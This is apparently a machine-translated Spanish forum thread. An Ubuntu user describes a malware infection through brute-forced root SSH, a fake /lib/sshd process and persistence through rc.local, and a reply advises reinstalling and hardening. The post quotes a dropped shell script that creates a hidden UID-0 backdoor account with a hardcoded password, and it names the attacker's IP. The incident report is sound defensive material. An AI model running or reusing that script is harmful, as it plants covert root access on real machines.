Estoy bastante seguro de que mi computadora portátil Ubuntu 13.10 está infectada con algún tipo de malware.
De vez en cuando, encuentro un proceso / lib / sshd (propiedad de root) que se ejecuta y consume mucha CPU. No es el servidor sshd el que ejecuta / usr / sbin / sshd.
El binario tiene permisos --wxrw-rwt y genera y genera scripts en el directorio / lib. Una reciente se llama 13959730401387633604 y hace lo siguiente
#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd
El usuario de gusr fue creado por el malware de forma independiente, y luego chpasswd se cuelga mientras consume 100% de CPU.
Hasta ahora, he identificado que el usuario de gusr se agregó adicionalmente a los archivos en / etc /
/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid
Parece que el malware hizo copias de todos estos archivos con el sufijo "-". La lista completa de archivos / etc / que fueron modificados por root está disponible aquí .
Además, el archivo / etc / hosts se cambió a este .
¡El / lib / sshd comienza agregándose al final del archivo /etc/init.d/rc.local!
Eliminé al usuario, eliminé los archivos, eliminé el árbol de procesado, cambié mis contraseñas y eliminé las claves públicas ssh.
Soy consciente de que básicamente estoy jodido, y lo más probable es que reinstale todo el sistema. Sin embargo, dado que inicio sesión en varias otras máquinas, sería bueno al menos intentar eliminarlo y descubrir cómo lo obtuve. Cualquier sugerencia sobre cómo hacer esto sería apreciada.
Parece que llegaron el 25 de marzo mediante el inicio de sesión de root de fuerza bruta. No tenía idea de que root ssh está habilitado por defecto en Ubuntu. Lo deshabilité y coloqué denyhosts.
El inicio de sesión fue de 59.188.247.236, aparentemente en algún lugar de Hong Kong.
Obtuve la computadora portátil de EmperorLinux, y habilitaron el acceso de root. Si tienes uno de esos y estás ejecutando sshd ten cuidado.
Linux/Ebury
. Es otra cosa, y posiblemente no tenga un nombre asignado. Ebury no crearía una nueva cuenta de usuario, y habría modificado la biblioteca compartida utilizada por openssh, no se ha eliminado en un nuevo binario llamado sshd.Respuestas:
Primero, ¡saque esa máquina de la red ahora!
En segundo lugar, ¿por qué habilitó la cuenta raíz? Realmente no debe habilitar la cuenta raíz a menos que tenga una muy buena razón para hacerlo.
En tercer lugar, sí, la única forma de asegurarse de que está limpio es realizar una instalación limpia. También se recomienda que comience de nuevo y no regrese a una copia de seguridad, ya que nunca puede estar seguro de cuándo comenzó todo.
También sugiero que configure un firewall en su próxima instalación y rechace todas las conexiones entrantes:
y luego permita ssh con:
¡y NO habilite la cuenta raíz! Ciertamente asegúrese de que el inicio de sesión ssh raíz esté deshabilitado.
fuente